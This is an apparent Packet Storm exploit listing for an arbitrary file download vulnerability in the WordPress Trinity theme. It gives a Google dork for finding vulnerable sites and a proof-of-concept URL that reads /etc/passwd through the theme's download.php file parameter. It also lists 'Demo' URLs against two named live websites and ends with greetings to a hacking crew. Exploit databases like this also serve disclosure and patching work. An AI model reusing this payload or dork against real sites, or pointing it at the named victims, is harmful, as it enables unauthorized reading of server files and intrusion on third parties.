WordPress Trinity Theme Arbitrary File Download

2014-09-09T00:00:00
ID PACKETSTORM:128212
Type packetstorm
Reporter Mr.Doel
Modified 2014-09-09T00:00:00

Description

                                        
                                            `# Exploit Title: Wordpress Trinity theme Arbitrary File Download Vulnerability  
# Date: 9/10/2014  
# Google Dork : inurl:/wp-content/themes/trinity/lib  
# Exploit Author: Mr.Doel  
# Vendor Homepage: https://churchthemes.net/themes/trinity/  
# Tested on: Windows 7   
  
POC :  
  
http://localhost/wp-content/themes/trinity/lib/scripts/download.php?file=/etc/passwd  
  
Demo :  
  
www.firstbco.net/wp-content/themes/trinity/lib/scripts/download.php?file=/etc/passwd  
  
http://laurelchurch.webfactional.com/wp-content/themes/trinity/lib/scripts/download.php?file=/etc/passwd  
  
=====================  
Greetz :  
  
Malang Cyber Crew - Indonesian Coder  
`